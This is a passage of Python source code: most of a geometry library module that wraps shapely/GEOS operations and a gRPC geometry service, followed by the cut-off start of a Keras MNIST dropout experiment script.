False\"\"\"\n return bool(self.impl['covers'](self, other))\n\n def s_contains(self, other):\n \"\"\"Returns True if the geometry contains the other, else False\"\"\"\n return bool(self.impl['contains'](self, other))\n\n def s_crosses(self, other):\n \"\"\"Returns True if the geometries cross, else False\"\"\"\n return bool(self.impl['crosses'](self, other))\n\n def s_disjoint(self, other):\n \"\"\"Returns True if geometries are disjoint, else False\"\"\"\n return bool(self.impl['disjoint'](self, other))\n\n def s_equals(self, other):\n \"\"\"Returns True if geometries are equal, else False\n\n Refers to point-set equality (or topological equality), and is equivalent to\n (self.within(other) & self.contains(other))\n \"\"\"\n return bool(self.impl['equals'](self, other))\n\n def s_intersects(self, other):\n \"\"\"Returns True if geometries intersect, else False\"\"\"\n return bool(self.impl['intersects'](self, other))\n\n def s_overlaps(self, other):\n \"\"\"Returns True if geometries overlap, else False\"\"\"\n return bool(self.impl['overlaps'](self, other))\n\n def s_touches(self, other):\n \"\"\"Returns True if geometries touch, else False\"\"\"\n return bool(self.impl['touches'](self, other))\n\n def s_within(self, other):\n \"\"\"Returns True if geometry is within the other, else False\"\"\"\n return bool(self.impl['within'](self, other))\n\n def s_equals_exact(self, other, tolerance):\n \"\"\"Returns True if geometries are equal to within a specified\n tolerance\n\n Refers to coordinate equality, which requires coordinates to be equal\n and in the same order for all components of a geometry\n \"\"\"\n return bool(self.impl['equals_exact'](self, other, tolerance))\n\n def s_almost_equals(self, other, decimal=6):\n \"\"\"Returns True if geometries are equal at all coordinates to a\n specified decimal place\n\n Refers to approximate coordinate equality, which requires coordinates be\n approximately equal and in the same order for all components of a geometry.\n \"\"\"\n return self.s_equals_exact(other, 0.5 * 10 ** (-decimal))\n\n def s_relate_pattern(self, other, pattern):\n \"\"\"Returns True if the DE-9IM string code for the relationship between\n the geometries satisfies the pattern, else False\"\"\"\n pattern = c_char_p(pattern.encode('ascii'))\n return bool(self.impl['relate_pattern'](self, other, pattern))\n\n # Linear referencing\n # ------------------\n\n @delegated\n def s_project(self, other, normalized=False):\n \"\"\"Returns the distance along this geometry to a point nearest the\n specified point\n\n If the normalized arg is True, return the distance normalized to the\n length of the linear geometry.\n \"\"\"\n if normalized:\n op = self.impl['project_normalized']\n else:\n op = self.impl['project']\n return op(self, other)\n\n @delegated\n @exceptNull\n def interpolate(self, distance, normalized=False):\n \"\"\"Return a point at the specified distance along a linear geometry\n\n Negative length values are taken as measured in the reverse\n direction from the end of the geometry. 
Out-of-range index\n values are handled by clamping them to the valid range of values.\n If the normalized arg is True, the distance will be interpreted as a\n fraction of the geometry's length.\n \"\"\"\n if normalized:\n op = self.impl['interpolate_normalized']\n else:\n op = self.impl['interpolate']\n return geom_factory(op(self, distance))\n\n @property\n def proj(self):\n return self._proj\n\n def set_epsg(self, value):\n self._proj = ProjectionData(epsg=value)\n\n @staticmethod\n def import_protobuf(geometry_data: geometry_pb2.GeometryData):\n \"\"\"\n import the geometry protobuf into a shapely geometry\n :param geometry_data: geometry_pb2.GeometryData with spatial reference defined\n :return: epl.BaseGeometry\n \"\"\"\n rpc_reader = RPCReader(lgeos, geometry_data)\n return rpc_reader.read()\n\n @staticmethod\n def from_envelope_data(envelope_data: geometry_pb2.EnvelopeData):\n pass\n\n @staticmethod\n def import_wkt(wkt: str, proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n # TODO. this is messy. should be using RPCReader for this\n proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n return BaseGeometry.import_protobuf(geometry_pb2.GeometryData(wkt=wkt, proj=proj))\n\n @staticmethod\n def import_wkb(wkb: bytes, proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n # TODO. this is messy. should be using RPCReader for this\n proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n return BaseGeometry.import_protobuf(geometry_pb2.GeometryData(ewkb=wkb, proj=proj))\n\n @staticmethod\n def _spat_ref_create(epsg: int = 0, proj4: str = \"\"):\n if epsg > 0:\n return geometry_pb2.ProjectionData(epsg=epsg)\n elif len(proj4) > 0:\n return geometry_pb2.ProjectionData(proj4=proj4)\n return None\n\n def buffer(self, distance: float, geodetic=True):\n \"\"\"\n buffer a geometry by distance. defaults to buffering the geometry in meters using Lambert Azimuthal Equal Area\n :param distance: distance in meters to buffer. If geodetic is set to false, buffers by the unit of the geometry\n provided (for instance, if wgs84, the buffer unit is degrees)\n :param geodetic: default to true. 
set to false if you want to buffer a geometry in it's native unit and not\n geodetic in meters\n :return: buffered geometry in spatial reference of input\n \"\"\"\n if geodetic:\n return self.geodetic_buffer(distance_m=distance)\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.BUFFER,\n buffer_params=geometry_pb2.Params.Buffer(\n distance=distance),\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def project(self, to_proj: geometry_pb2.ProjectionData = None, to_epsg: int = 0, to_proj4: str = \"\"):\n to_proj = get_proj(proj=to_proj, epsg=to_epsg, proj4=to_proj4)\n if proj_eq(self.proj, to_proj):\n # notice, no copy made here, whereas, project always copies the data\n return self\n\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.PROJECT,\n result_proj=to_proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def simplify(self):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.SIMPLIFY,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def convex(self):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.CONVEX_HULL,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def densify(self, max_length_m: float, geodetic=True, result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\nDensify a polyline or polygon by the max_length in meters. No segment will be larger than the max_length. 
If geodetic is set to true the densification will use the geodesic midpoint from Rapp\n Args:\n max_length_m: the maximum length of a segment.\n geodetic: bool, if true densify considers curvature of ellipsoid\n result_proj: projection for results (otherwise uses projection of input)\n\n Returns: densified geometry\n\n \"\"\"\n if self.geom_type != 'Polygon' and self.geom_type != 'LineString':\n raise ValueError(\"only polygon or polylines\")\n\n params = geometry_pb2.Params.Densify(max_length=max_length_m)\n operator_type = geometry_pb2.GEODETIC_DENSIFY_BY_LENGTH\n if not geodetic:\n operator_type = geometry_pb2.DENSIFY_BY_LENGTH\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=operator_type,\n densify_params=params,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def area(self, geodetic=True):\n \"\"\"\n get the area of the polygon, defaults to geodetic area.\n :param geodetic:\n :return:\n \"\"\"\n if geodetic:\n return self.geodetic_area()\n return self.s_area\n\n def geodetic_area(self):\n \"\"\"\n get the geodesic area of a polygon.\n :return: double value that is the WGS84 area of the geometry\n \"\"\"\n op_area = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODETIC_AREA,\n result_proj=geometry_pb2.ProjectionData(epsg=4326),\n result_encoding=RESULT_ENCODING)\n area_response = geometry_init.geometry_service.operate(op_area)\n return area_response.measure\n\n def distance(self, other_geom: BaseGeometry, geodetic=True):\n if geodetic:\n return self.geodetic_distance(other_geom=other_geom)\n return self.s_distance(other_geom)\n\n def geodetic_distance(self, other_geom: BaseGeometry):\n # TODO, requires proper implementation in Geometry Service\n centroid = self.union(other_geom, result_proj=geometry_pb2.ProjectionData(epsg=4326)).centroid\n local_proj = geometry_pb2.ProjectionData(\n custom=geometry_pb2.ProjectionData.Custom(lon_0=centroid.x,\n lat_0=centroid.y))\n\n op_distance = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=geometry_pb2.DISTANCE,\n operation_proj=local_proj,\n result_encoding=RESULT_ENCODING)\n distance_response = geometry_init.geometry_service.operate(op_distance)\n return distance_response.measure\n\n def geodetic_buffer(self, distance_m):\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODESIC_BUFFER,\n buffer_params=geometry_pb2.Params.Buffer(\n distance=distance_m),\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def symmetric_difference(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.SYMMETRIC_DIFFERENCE,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def difference(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.DIFFERENCE,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def intersection(self,\n other_geom: 
BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\n get the intersecting geometry. if the geometries intersected are in different spatial references, you'll need\n to define a result spatial reference for them both to be projected into. That result spatial reference will be\n the operation spatial reference. If you want their intersection to be in a different spatial reference than the\n results, you can define that as well\n :param other_geom: other geometry to be intersected\n :param operation_proj: the spatial reference both geometries should be projected into for the intersection operation\n :param result_proj: the resulting spatial reference of the output geometry\n :return:\n \"\"\"\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.INTERSECTION,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n def random_multipoint(self,\n points_per_square_km: float,\n seed=None,\n result_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\nCreate a multipoint geometry where all points exist within the input polygon. Points are calculated on an equal area geometry\n Args:\n points_per_square_km: desired average points per square kilometer\n seed: mersenne seed\n result_proj: if projection is desired\n\n Returns: multipoint\n\n \"\"\"\n if self.geom_type != 'Polygon' and self.geom_type != 'MultiPolygon':\n raise ValueError('only implemented for Polygon')\n\n if seed is None:\n seed = random.randint(0, 20000000)\n print(\"generated seed {}\".format(seed))\n\n params = geometry_pb2.Params.RandomPoints(seed=seed,\n points_per_square_km=points_per_square_km)\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.RANDOM_POINTS,\n random_points_params=params,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def union(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n if other_geom is None:\n if result_proj:\n return self.project(to_proj=result_proj)\n return self\n\n return self._two_geom_op(other_geom=other_geom,\n operator_type=geometry_pb2.UNION,\n operation_proj=operation_proj,\n result_proj=result_proj)\n\n @staticmethod\n def cascaded_union(geometry_iterable: Iterable,\n percent_reduction: int = 0,\n max_point_count: int = 0,\n batch_size: int = 25):\n \"\"\"\n union an iterable list of geometries\n @param geometry_iterable: input list of geometries\n @param percent_reduction: if generalizing the output, how much to reduce the geometry by\n @param max_point_count: if generalizing the output, what is the max number of points\n @param batch_size: batch size for number of geometries to stream up to service\n @return: a unioned geometry\n \"\"\"\n intermediate = []\n for geometry in geometry_iterable:\n intermediate.append(geometry)\n if len(intermediate) == batch_size:\n # every stream_interval items\n intermediate = [geometry_init.geometry_service.op_client_stream(intermediate)]\n\n result = intermediate[0]\n if len(intermediate) > 1:\n result = geometry_init.geometry_service.op_client_stream(intermediate)\n\n if percent_reduction == 0 and max_point_count == 0:\n # if no generalize\n return result\n\n return result.generalize(percent_reduction=percent_reduction, 
max_point_count=max_point_count)\n\n @staticmethod\n def s_cascaded_union(geometry_iterable: Iterable[BaseGeometry]):\n \"\"\"\nunion geometries locally using shapely union.\n @param geometry_iterable:\n @return:\n \"\"\"\n geometries = [geometry for geometry in geometry_iterable]\n projs = [geometry.proj for geometry in geometries]\n sample_proj = None\n for i, proj in enumerate(projs):\n if i == len(projs) - 2:\n sample_proj = proj\n break\n if not proj_eq(proj, projs[i]):\n raise ValueError(\"all geometries must have the same spatial reference\")\n\n try:\n L = len(geometries)\n except TypeError:\n geometries = [geometries]\n L = 1\n subs = (c_void_p * L)()\n for i, g in enumerate(geometries):\n subs[i] = g._geom\n collection = lgeos.GEOSGeom_createCollection(6, subs, L)\n return geom_factory(lgeos.methods['cascaded_union'](collection), proj=sample_proj)\n\n def _operation_proj(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n if operation_proj is None and not self.proj_eq(other_geom.proj):\n operation_proj = self.proj\n warn(\"left and right geometries have different proj and operation_proj is None. defaulting \"\n \"operation_proj to the left geometry proj: \\n{}\".format(self.proj))\n return operation_proj\n\n def _two_geom_op(self,\n other_geom: BaseGeometry,\n operator_type: geometry_pb2.OperatorType,\n operation_proj: geometry_pb2.ProjectionData = None,\n result_proj: geometry_pb2.ProjectionData = None):\n operation_proj = self._operation_proj(other_geom=other_geom, operation_proj=operation_proj)\n\n op_request = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=operator_type,\n operation_proj=operation_proj,\n result_proj=result_proj,\n result_encoding=RESULT_ENCODING)\n return BaseGeometry.import_protobuf(geometry_init.geometry_service.operate(op_request).geometry)\n\n def equals(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n \"\"\"\n Returns True if geometries are equal, else False.\n :param other_geom: other geometry\n :param operation_proj: if geometries have different spatial references, project both geometries to one spatial\n reference for execution of equality\n :return:\n \"\"\"\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.EQUALS, operation_proj=operation_proj)\n\n def contains(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.CONTAINS, operation_proj=operation_proj)\n\n def within(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.WITHIN, operation_proj=operation_proj)\n\n def touches(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.TOUCHES, operation_proj=operation_proj)\n\n def overlaps(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.OVERLAPS, operation_proj=operation_proj)\n\n def crosses(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.CROSSES, operation_proj=operation_proj)\n\n def disjoint(self,\n other_geom: BaseGeometry,\n operation_proj: 
geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.DISJOINT, operation_proj=operation_proj)\n\n def intersects(self,\n other_geom: BaseGeometry,\n operation_proj: geometry_pb2.ProjectionData = None):\n return self._relate(other_geom=other_geom, relate_type=geometry_pb2.INTERSECTS, operation_proj=operation_proj)\n\n def _relate(self,\n other_geom: BaseGeometry,\n relate_type: geometry_pb2.OperatorType,\n operation_proj: geometry_pb2.ProjectionData = None):\n operation_proj = self._operation_proj(other_geom=other_geom, operation_proj=operation_proj)\n\n op_request = geometry_pb2.GeometryRequest(left_geometry=self.geometry_data,\n right_geometry=other_geom.geometry_data,\n operator=relate_type,\n operation_proj=operation_proj)\n return geometry_init.geometry_service.operate(op_request).spatial_relationship\n\n def generalize(self, percent_reduction=0, max_point_count=0, remove_degenerates=True):\n generalize_by_area_params = geometry_pb2.Params.GeneralizeByArea(\n percent_reduction=percent_reduction,\n max_point_count=max_point_count,\n remove_degenerates=remove_degenerates\n )\n\n op_request = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GENERALIZE_BY_AREA,\n generalize_by_area_params=generalize_by_area_params,\n result_encoding=RESULT_ENCODING)\n\n geometry_response = geometry_init.geometry_service.operate(op_request)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n @property\n def geometry_data(self) -> geometry_pb2.GeometryData:\n \"\"\"\n create a GeometryData protobuf object from the current geometry\n :return: GeometryData object with a defined spatial reference\n \"\"\"\n return geometry_pb2.GeometryData(ewkb=self.wkb, proj=self._proj)\n\n @property\n def envelope_data(self):\n \"\"\"\n create a EnvelopeData protobuf object from the current geometry with\n the spatial reference defined from the geometry spatial reference\n :return: EnvelopeData protobuf object\n \"\"\"\n return geometry_pb2.EnvelopeData(xmin=self.bounds[0],\n ymin=self.bounds[1],\n xmax=self.bounds[2],\n ymax=self.bounds[3],\n proj=self._proj)\n\n @property\n def shapely_dump(self):\n \"\"\"\nCreate a shapely geometry instance from the epl geometry instance\n @return:\n \"\"\"\n return shapely_loads_wkb(self.wkb)\n\n @property\n def carto_geom(self):\n \"\"\"\nCarto was not playing nice with our wrapper of shapely\n @return:\n \"\"\"\n return self.shapely_dump\n\n @property\n def carto_bounds(self):\n \"\"\"\nbounds order according to carto\n @return:\n \"\"\"\n b = self.bounds\n return b[0], b[2], b[1], b[3]\n\n def translate(self, x_offset=0.0, y_offset=0.0, geodetic=True):\n \"\"\"\n translates (or offset) a geometry by the values. If geodetic (default), then offsets are in meters, otherwise,\n offsets are in unit of spatial reference (for wgs-84, unit is degrees)\n :param x_offset: offset in x direction (or in longitude direction). Offset is added to all x values in geometry\n :param y_offset: offset in y direction (or in latitude direction). Offset is added to all y values in geometry\n :param geodetic: project geometry to wgs-84 and shift geometry by meters. 
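# (hedged aside: a pyproj illustration, not the geometry service implementation; the Custom(lon_0, lat_0) projection used by geodetic_distance above and by the geodetic branch just below is analogous, but its exact CRS is not shown here) centring a local CRS on the geometry is what makes metre offsets meaningful, e.g. with an azimuthal equidistant projection:\nfrom pyproj import CRS, Transformer\n\ndef offset_wgs84_by_metres(lon, lat, dx_m, dy_m):\n    local = CRS.from_proj4(f'+proj=aeqd +lon_0={lon} +lat_0={lat} +units=m')\n    fwd = Transformer.from_crs('EPSG:4326', local, always_xy=True)\n    inv = Transformer.from_crs(local, 'EPSG:4326', always_xy=True)\n    x, y = fwd.transform(lon, lat)\n    return inv.transform(x + dx_m, y + dy_m)  # lon, lat after the shift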
If set to false, offsets are executed\n in spatial reference of geometry\n :return: new geometry\n \"\"\"\n local_proj = None\n if geodetic:\n centroid = self.project(to_proj=geometry_pb2.ProjectionData(epsg=4326)).centroid\n local_proj = geometry_pb2.ProjectionData(\n custom=geometry_pb2.ProjectionData.Custom(lon_0=centroid.x,\n lat_0=centroid.y))\n\n affine_transform_params = geometry_pb2.Params.AffineTransform(x_offset=x_offset,\n y_offset=y_offset)\n op_translate = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n affine_transform_params=affine_transform_params,\n operator=geometry_pb2.AFFINE_TRANSFORM,\n operation_proj=local_proj,\n result_proj=self.proj,\n result_encoding=RESULT_ENCODING)\n geometry_response = geometry_init.geometry_service.operate(op_translate)\n return BaseGeometry.import_protobuf(geometry_response.geometry)\n\n def length(self, geodetic=True):\n if not geodetic:\n return self.s_length\n op_length = geometry_pb2.GeometryRequest(geometry=self.geometry_data,\n operator=geometry_pb2.GEODETIC_LENGTH)\n geometry_response = geometry_init.geometry_service.operate(op_length)\n return geometry_response.measure\n\n\nclass BaseMultipartGeometry(BaseGeometry):\n\n def shape_factory(self, *args):\n # Factory for part instances, usually a geometry class\n raise NotImplementedError(\"To be implemented by derived classes\")\n\n @property\n def ctypes(self):\n raise NotImplementedError(\n \"Multi-part geometries have no ctypes representations\")\n\n @property\n def __array_interface__(self):\n \"\"\"Provide the Numpy array protocol.\"\"\"\n raise NotImplementedError(\"Multi-part geometries do not themselves \"\n \"provide the array interface\")\n\n def _get_coords(self):\n raise NotImplementedError(\"Sub-geometries may have coordinate \"\n \"sequences, but collections do not\")\n\n def _set_coords(self, ob):\n raise NotImplementedError(\"Sub-geometries may have coordinate \"\n \"sequences, but collections do not\")\n\n @property\n def coords(self):\n raise NotImplementedError(\n \"Multi-part geometries do not provide a coordinate sequence\")\n\n @property\n def geoms(self):\n if self.is_empty:\n return []\n return GeometrySequence(self, self.shape_factory)\n\n def __iter__(self):\n if not self.is_empty:\n return iter(self.geoms)\n else:\n return iter([])\n\n def __len__(self):\n if not self.is_empty:\n return len(self.geoms)\n else:\n return 0\n\n def __getitem__(self, index):\n if not self.is_empty:\n return self.geoms[index]\n else:\n return ()[index]\n\n def __eq__(self, other):\n return (\n type(other) == type(self) and\n len(self) == len(other) and\n all(x == y for x, y in zip(self, other)) and\n self._proj_eq__(other)\n )\n\n def _proj_eq__(self, other):\n return proj_eq(self.proj, other.proj)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n __hash__ = None\n\n def svg(self, scale_factor=1., color=None):\n \"\"\"Returns a group of SVG elements for the multipart geometry.\n Parameters\n ==========\n scale_factor : float\n Multiplication factor for the SVG stroke-width. Default is 1.\n color : str, optional\n Hex string for stroke or fill color. 
Default is to use \"#66cc99\"\n if geometry is valid, and \"#ff3333\" if invalid.\n \"\"\"\n if self.is_empty:\n return '<g />'\n if color is None:\n color = \"#66cc99\" if self.is_valid else \"#ff3333\"\n return '<g>' + \\\n ''.join(p.svg(scale_factor, color) for p in self) + \\\n '</g>'\n\n\nclass GeometrySequence(object):\n \"\"\"\n Iterative access to members of a homogeneous multipart geometry.\n \"\"\"\n\n # Attributes\n # ----------\n # _factory : callable\n # Returns instances of Shapely geometries\n # _geom : c_void_p\n # Ctypes pointer to the parent's GEOS geometry\n # _ndim : int\n # Number of dimensions (2 or 3, generally)\n # __p__ : object\n # Parent (Shapely) geometry\n shape_factory = None\n _geom = None\n __p__ = None\n _ndim = None\n\n def __init__(self, parent, type):\n self.shape_factory = type\n self.__p__ = parent\n\n def _update(self):\n self._geom = self.__p__._geom\n self._ndim = self.__p__._ndim\n\n def _get_geom_item(self, i):\n g = self.shape_factory()\n g._other_owned = True\n g._geom = lgeos.GEOSGetGeometryN(self._geom, i)\n g._ndim = self._ndim\n g.__p__ = self\n return g\n\n def __iter__(self):\n self._update()\n for i in range(self.__len__()):\n yield self._get_geom_item(i)\n\n def __len__(self):\n self._update()\n return lgeos.GEOSGetNumGeometries(self._geom)\n\n def __getitem__(self, key):\n self._update()\n m = self.__len__()\n if isinstance(key, integer_types):\n if key + m < 0 or key >= m:\n raise IndexError(\"index out of range\")\n if key < 0:\n i = m + key\n else:\n i = key\n return self._get_geom_item(i)\n elif isinstance(key, slice):\n if type(self) == HeterogeneousGeometrySequence:\n raise TypeError(\n \"Heterogenous geometry collections are not sliceable\")\n res = []\n start, stop, stride = key.indices(m)\n for i in range(start, stop, stride):\n res.append(self._get_geom_item(i))\n return type(self.__p__)(res or None)\n else:\n raise TypeError(\"key must be an index or slice\")\n\n @property\n def _longest(self):\n max = 0\n for g in iter(self):\n l = len(g.coords)\n if l > max:\n max = l\n\n\nclass HeterogeneousGeometrySequence(GeometrySequence):\n \"\"\"\n Iterative access to a heterogeneous sequence of geometries.\n \"\"\"\n\n def __init__(self, parent):\n super(HeterogeneousGeometrySequence, self).__init__(parent, None)\n\n def _get_geom_item(self, i):\n sub = lgeos.GEOSGetGeometryN(self._geom, i)\n g = geom_factory(sub, parent=self)\n g._other_owned = True\n return g\n\n\nclass EmptyGeometry(BaseGeometry):\n def __init__(self):\n \"\"\"Create an empty geometry.\"\"\"\n BaseGeometry.__init__(self)\n\n\nclass RPCReader(object):\n _lgeos = None\n _reader_wkb = None\n _reader_wkt = None\n _geometry_data = None\n\n def __init__(self, lgeos, geometry_data: geometry_pb2.GeometryData):\n \"\"\"Create Reader\"\"\"\n self._lgeos = lgeos\n self._geometry_data = geometry_data\n # TODO, manage geometry_data with geojson and eprojishape\n if len(self._geometry_data.wkt) > 0:\n self._reader_wkt = self._lgeos.GEOSWKTReader_create()\n elif len(geometry_data.ewkb) > 0:\n self._reader_wkb = self._lgeos.GEOSWKBReader_create()\n elif len(geometry_data.wkb) > 0:\n self._reader_wkb = self._lgeos.GEOSWKBReader_create()\n # TODO raise an exception here\n\n def __del__(self):\n \"\"\"Destroy Reader\"\"\"\n if self._lgeos is not None:\n if self._reader_wkb is not None:\n self._lgeos.GEOSWKBReader_destroy(self._reader_wkb)\n self._reader_wkb = None\n elif self._reader_wkt is not None:\n self._lgeos.GEOSWKTReader_destroy(self._reader_wkt)\n self._reader_wkt = None\n 
self._lgeos = None\n\n def read(self):\n geom = None\n if len(self._geometry_data.wkt) > 0:\n geom = self.read_wkt()\n elif len(self._geometry_data.wkb) > 0:\n geom = self.read_wkb(self._geometry_data.wkb)\n elif len(self._geometry_data.ewkb) > 0:\n geom = self.read_wkb(self._geometry_data.ewkb)\n result = geom_factory(geom, proj=self._geometry_data.proj)\n return result\n\n def read_wkb(self, wkb_bytes_array):\n geom = self._lgeos.GEOSWKBReader_read(\n self._reader_wkb, c_char_p(wkb_bytes_array), c_size_t(len(wkb_bytes_array)))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors \"\n \"while reading input.\")\n return geom\n\n def read_wkt(self):\n \"\"\"Returns geometry from WKT\"\"\"\n text = self._geometry_data.wkt\n if sys.version_info[0] >= 3:\n text = self._geometry_data.wkt.encode('ascii')\n geom = self._lgeos.GEOSWKTReader_read(self._reader_wkt, c_char_p(text))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors \"\n \"while reading input.\")\n return geom\n\n\ndef get_proj(proj: geometry_pb2.ProjectionData = None, epsg: int = 0, proj4: str = \"\"):\n if (proj is None or (proj.epsg == 0 and len(proj.proj4) == 0 and not proj.HasField('custom'))) and \\\n epsg == 0 and len(proj4) == 0:\n raise ValueError(\"must define a spatial reference for geometry on creation, \"\n \"must be epsg or proj4 (wkt not supported)\")\n if proj is None and epsg > 0:\n proj = geometry_pb2.ProjectionData(epsg=epsg)\n elif proj is None and len(proj4) > 0:\n proj = geometry_pb2.ProjectionData(proj4=proj4)\n return proj\n\n\ndef proj_eq(proj: geometry_pb2.ProjectionData, other_proj: geometry_pb2.ProjectionData):\n if proj.epsg > 0:\n return proj.epsg == other_proj.epsg\n elif len(proj.proj4) > 0:\n return proj.proj4 == other_proj.proj4\n elif len(proj.wkt) > 0:\n return proj.wkt == other_proj.wkt\n return False\n","repo_name":"sunny-g/geo-grpc-api","sub_path":"python/epl_geometry/epl/geometry/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":58524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"29009837914","text":"\"\"\"CAP-6619 Deep Learning Fall 2018 term project\nMNIST with standard deep neural network and dropout\n\nDropout paper: http://jmlr.org/papers/volume15/srivastava14a.old/srivastava14a.pdf # noqa\n\"\"\"\nimport time\nimport pandas as pd\nimport json\nimport os\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import backend\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.constraints import max_norm\nfrom tensorflow.keras.datasets import mnist\nfrom datetime import datetime\nfrom io import StringIO\nfrom argparse import ArgumentParser\nfrom CAP6619_term_project_mnist_mlp_dropout_parameters import Parameters\n\n\ndef create_model(parameters):\n \"\"\"Create a model described by the given parameters.\"\"\"\n # To make lines shorter\n p = parameters\n\n model = models.Sequential()\n\n if p.network == 'standard':\n model.add(layers.Dense(p.units_per_layer,\n activation='relu',\n input_shape=(pixels_per_image,)))\n for _ in range(p.hidden_layers - 1):\n model.add(layers.Dense(p.units_per_layer, activation='relu'))\n elif p.network in ('dropout_no_adjustment', 'dropout'):\n units_hidden_layer = 0\n if p.network == 'dropout':\n # Adjust number of units in each layer: '...if an n-sized layer is\n # optimal for a standard neural net on any given task, a good\n # 
dropout net should have at least n/p units.' [Note that Keras\n # uses a 'drop' rate, not 'keep', hence the '1 -'].\n units_hidden_layer = int(\n p.units_per_layer / (1 - p.dropout_rate_hidden_layer))\n else:\n units_hidden_layer = p.units_per_layer\n\n model.add(layers.Dropout(p.dropout_rate_input_layer,\n input_shape=(pixels_per_image,)))\n for _ in range(p.hidden_layers):\n # Reason to use he_normal initializer: source code the paper points\n # to has 'initialization: DENSE_GAUSSIAN_SQRT_FAN_IN' for weights.\n if p.max_norm_max_value == 'none':\n model.add(layers.Dense(units_hidden_layer, activation='relu',\n kernel_initializer='he_normal'))\n else:\n model.add(layers.Dense(units_hidden_layer, activation='relu',\n kernel_initializer='he_normal',\n kernel_constraint=max_norm(\n int(p.max_norm_max_value))))\n model.add(layers.Dropout(rate=p.dropout_rate_hidden_layer))\n else:\n assert False # Invalid network type\n\n # All networks end with the sofmax layer to identify the 0-9 digits\n model.add(layers.Dense(10, activation='softmax'))\n\n # Create the optimizer\n optimizer = None\n if p.optimizer == 'sgd':\n optimizer = optimizers.SGD(\n p.learning_rate, momentum=float(p.sgd_momentum), decay=p.decay)\n elif p.optimizer == 'rmsprop':\n optimizer = optimizers.RMSprop(p.learning_rate, decay=p.decay)\n else:\n assert False # Invalid optimizer\n\n model.compile(optimizer=optimizer,\n 